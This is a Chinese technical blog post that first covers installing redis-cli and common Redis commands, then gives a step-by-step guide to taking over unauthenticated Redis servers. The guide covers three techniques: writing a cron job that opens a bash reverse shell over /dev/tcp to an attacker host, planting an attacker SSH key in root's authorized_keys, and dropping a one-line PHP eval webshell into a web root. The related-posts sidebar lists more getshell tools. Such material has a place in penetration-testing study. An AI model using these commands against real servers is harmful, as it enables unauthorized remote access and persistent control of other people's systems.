redis服务连接及常规操作和redis服务getshell

最新推荐文章于 2024-06-13 15:07:08 发布
最新推荐文章于 2024-06-13 15:07:08 发布
阅读量769 收藏 23
点赞数 7
文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whale_waves/article/details/138793905
版权

简介

Redis,英文全称是Remote Dictionary Server(远程字典服务),是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。

redis服务于传统服务器不同,redis是内存数据库,Redis的数据是存在内存中的。它的读写速度非常快,每秒可以处理超过10万次读写操作,因此redis被广泛应用于缓存。

连接redis服务

首先下载redis-cli(专用于redis服务的命令程序)

下载程序

wget http://download.redis.io/redis-stable.tar.gz

解压

tar -zxf redis-stable.tar.gz

编译

cd redis-stable  #进入目录

make                #编译文件

进入解压好的文件夹(这里我将此程序换了位置改了名字)

编译文件

此时会出现很多数据,不要退出,可能会跑一会儿

创建链接

编译完成后需要将src目录下的redis_cli程序创建一个链接,方便后续利用

ln -s /home/kali/tools/redis_连接工具/src/redis-cli /usr/local/bin/redis-cli

这样就能再任何目录运行此命令

redis的一些常用命令

  1. 启动 Redis 服务:

    redis-server

  2. 连接到 Redis 服务:

    redis-cli

  3. 设置键值对:

    SET key value

  4. 获取键对应的值:

    GET key

  5. 删除键值对:

    DEL key

  6. 检查键是否存在:

    EXISTS key

  7. 设置键的过期时间:

    EXPIRE key seconds

  8. 查看键的剩余过期时间:

    TTL key

  9. 查看键的类型:

    TYPE key

  10. 获取所有键:

    KEYS pattern

  11. 设置列表:

    LPUSH key value1 [value2 ...]

  12. 获取列表:

    LRANGE key start stop

  13. 设置哈希表:

    HSET key field value

  14. 获取哈希表中的值:

    HGET key field

  15. 设置集合:

    SADD key member1 [member2 ...]

  16. 获取集合:

    SMEMBERS key

  17. 获取有关Redis服务器的信息和统计信息:

    info

  18. 获取索引为 0 的数据库中键的数量

    dbsize

redis-getshell

常规的拿到shell的方式有三种

  1. 写定时任务拿到shell
  2. 通过写ssh key的方式拿到shell
  3. 直接再目录里写webshell

写定时任务拿到shell

其实和常规写定时任务是一样的道理,也都是写个文件到crontalbs这些定时文件夹里,或者直接覆盖crontab

  1. 第一步:上线redis

    redis-cli -h 10.129.136.187 -p 6379

  2. 第二步:设置文件夹路径为/var/spool/cron/crontabs

    config set dir /var/spool/cron/crontabs

  3. 第三步:设置备份文件名

    config set dbfilename getshell

  4. 第四步:设置键对值

    set shell '\n\n\n*****bash -i >& /dev/tcp/攻击机ip/攻击机监听端口 0>&1'

  5. 第五步:保存

    save

然后等待一会儿等攻击机监听到流量即可

通过写ssh key的方式拿到shell

此方法成功的先决条件是

  1. redis服务是以root登录的
  2. 开始22端口并且允许使用密钥登录
  1. 首先攻击机本地生成一个公钥文件

    ssh-keygen -t rsa

  2. 然后得到一个公钥和私钥
  3. 给公钥添加换行符写到txt文件里

    (echo -e "\n\n\n\n"; cat id_rsa.pub; echo -e "\n\n\n\n") > pub.txt

  4. 写入公钥到被攻击机

    config set dir /root/.ssh
    config set dbfilename 'authorized_keys'
    config set shell 'pub.txt的值'
    save
  5. 最后使用攻击机生成的私钥登录即可
    ssh -i id_rsa root@被攻击机ip

直接写webshell

先决条件

  1. 已知网站根目录
  2. 登录redis的用户在网站根目录有可写权限
  1. config set dir /var/www/123.com/html
  2. config set dbfilename shell.php
  3. set shell '<?= eval($_POST[a]);>'
  4. save

后续直接使用蚁剑冰蝎这些上线即可

怪兽不会rap_哥哥我会crash
关注
  • 7
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
redis未授权getshell四种方式
BING
04-24 4150
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
redis漏洞复现】Redis getshell的几种方式
热门推荐
一剑开天门!的博客
03-01 1万+
Redis getshell的几种方式
从Reids漏洞聊到getshell手法,再到计划任务和主从复制原理
milu_Sec的博客
01-07 1080
redis漏洞总结 getshell手法 写文件原理
redis getshell方法
00勇士王子的博客
03-07 1678
redis getshell方法总结
第02篇:Redis主从复制getshell1
08-03
1、生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成 1、监听本地1234端口 2、将Redis服务器设置
Redis 命令列表及操作示例
06-10
redis命令实践,包含常用的各个redis命令,以及一些实际例子,- `SET key value`: 将字符串值 `value` 存储在键 `key` 中。 `GET key`: 获取存储在键 `key` 中的值。 **示例**: ```shell SET username "Alice...
redis-getshell
06-05
redis-getshell 下面的脚本演示了通过 redis 服务器转储 webshel​​l 的可能性 用法 %> ./redis-getshell.pl --host 127.0.0.1 --port 6379 --path /tmp/ooo.php [+] Connection established 127.0.0.1:6379 [+] ...
RedisShell命令1
08-08
Redis 提供的这些命令覆盖了基本的创建(CRUD)操作,适用于大数据存储和处理场景,其高效性能和丰富的数据结构使得它成为许多应用程序的首选缓存数据库解决方案。了解并熟练掌握这些命令,能帮助开发者更有效地利用...
Python如何操作docker redis过程解析
12-17
使用操作命令借助subprocess模块进行操作 #encoding:utf-8 import subprocess def cmd(command): subp = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,encoding=...
Redis-Getshell:Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
Redis未授权访问漏洞复现与工具安装
Welcome To Myon'Blog !
01-11 1985
redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。Redis未授权访问影响版本为5.0.5以下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
redis未授权getshell整合利用
最新发布
qq_40898302的博客
06-13 1062
redis未授权getshell四种方式
记录一次Redis未授权getshell几种常见方法
qq_45888826的博客
09-17 3797
记录一次Redis未授权getshell几种常见方法
Redis 未授权访问漏洞与getshell(附getshell检测工具)
告白的博客
02-24 3958
Redis 简介. Redis 是完全开源免费的,遵守 BSD 协议,是一个灵活的高性能 key-value 数据结构存储,常见用来作为数据库,其在安全配置问题上存在一些问题,如常见的未授权范围与Pickle反序列化
redis未授权访问getshell
Jiajiajiang_的博客
08-02 5498
参考:https://blog.csdn.net/guxiaoguo/article/details/78913245 利用条件:linux,对方开启ssh 用到的工具:kali nmap redis 公司测试服务器:10.0.3.45 redis默认端口:6379 主要思路:利用redis未授权访问命令给root账户写入SSH公钥文件,然后通过SSH登录服务器 ...
redis 在渗透中 getshell 方法总结
chenglanqi6606的博客
05-07 2504
0x00 前言 今天同学突然提到了redis,想到最近搞站确实有一段时间没有遇到redis getshell的场景了(主要是最近懒,搞得少),有些利用方式都忘的差不多,这里再对常见的redis getshell方式总结并复现一遍,避免遗忘。如果有同学恰好看到了这篇文章,并能解决自己的问题,...
Redis Getshell自动化实践之webshell
乐枕的家
07-21 4606
前两篇文章介绍了两种直接root权限getshell的方式,这里介绍通过写入webpage来得到shell的半自动化脚本. 脚本的意义是将误报的可能性降到最低,发现目标并简化手工操作.利用流程1 通过redis未授权访问漏洞,向redis插入一条记录,内容是一句话木马或其他webshell 2 找到web绝对路径,写入webshell 3 菜刀或其它半自动化exp逻辑半自动的原因是最后写入的w
shellredis cli连接哨兵模式
08-30
要在shell连接Redis哨兵模式,你可以使用以下命令: ``` redis-cli -h <哨兵IP地址> -p <哨兵端口号> SENTINEL get-master-addr-by-name <主服务器名称> ``` 请将`<哨兵IP地址>`替换为实际的哨兵IP地址,将`<哨兵端口号>`替换为实际的哨兵端口号,将`<主服务器名称>`替换为实际的主服务器名称。 这个命令会返回主服务器的IP地址和端口号,你可以使用这些信息来连接Redis服务器。 例如,假设你有3个哨兵实例,它们的IP地址分别是192.168.0.1、192.168.0.2和192.168.0.3,端口号都是26379,主服务器的名称是mymaster。那么你可以运行以下命令来连接Redis服务器: ``` redis-cli -h 192.168.0.1 -p 26379 SENTINEL get-master-addr-by-name mymaster ``` 这个命令会返回主服务器的IP地址和端口号,你可以使用这些信息来连接Redis服务器。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怪兽不会rap_哥哥我会crash

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值